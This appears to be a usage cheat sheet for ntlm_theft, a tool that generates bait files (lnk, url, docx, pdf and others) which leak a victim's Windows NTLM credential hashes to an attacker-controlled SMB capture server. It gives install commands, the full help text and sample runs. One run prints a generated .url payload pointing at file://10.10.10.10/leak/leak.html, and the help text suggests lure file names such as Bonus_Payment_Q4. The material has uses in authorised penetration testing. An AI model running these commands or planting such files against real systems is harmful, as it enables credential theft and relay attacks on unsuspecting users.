git clone https://github.com/Greenwolf/ntlm_theft.git
python3 -m pip install xlsxwriter

ntlm_theft.py --generate all --server <ip_of_smb_catcher_server> --filename <base_file_name>

ntlm_theft by Jacob Wilkin(Greenwolf)

options:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -vv, --verbose        Verbose Mode
  -g {scf,xlsx,docx,jnlp,zoom,autoruninf,rtf,m3u,desktopini,lnk,wax,application,htm,all,url,pdf,xml,modern,asx}, --generate {scf,xlsx,docx,jnlp,zoom,autoruninf,rtf,m3u,desktopini,lnk,wax,application,htm,all,url,pdf,xml,modern,asx}
                        Choose to generate all files or a specific filetype
  -s SERVER, --server SERVER
                        The IP address of your SMB hash capture server (Responder, impacket ntlmrelayx, Metasploit auxiliary/server/capture/smb, etc)
  -f FILENAME, --filename FILENAME
                        The base filename without extension, can be renamed later (test, Board-Meeting2020, Bonus_Payment_Q4)

-g, --generate  : Choose to generate all files or a specific filetype
-s, --server    : The IP address of your SMB hash capture server (Responder, impacket ntlmrelayx, Metasploit auxiliary/server/capture/smb, etc)
-f, --filename  : The base filename without extension, can be renamed later (eg: test, Board-Meeting2020, Bonus_Payment_Q4)

$ python3 ntlm_theft.py -g lnk -s 10.10.10.10 -f generated-file    
Created: generated-file/generated-file.lnk (BROWSE TO FOLDER)
Generation Complete.

$ python3 ntlm_theft.py -g url -s 10.10.10.10 -f generated-url  
Created: generated-url/generated-url-(url).url (BROWSE TO FOLDER)
Created: generated-url/generated-url-(icon).url (BROWSE TO FOLDER)
Generation Complete.

$ cat generated-url/generated-url-\(url\).url 
[InternetShortcut]
URL=file://10.10.10.10/leak/leak.html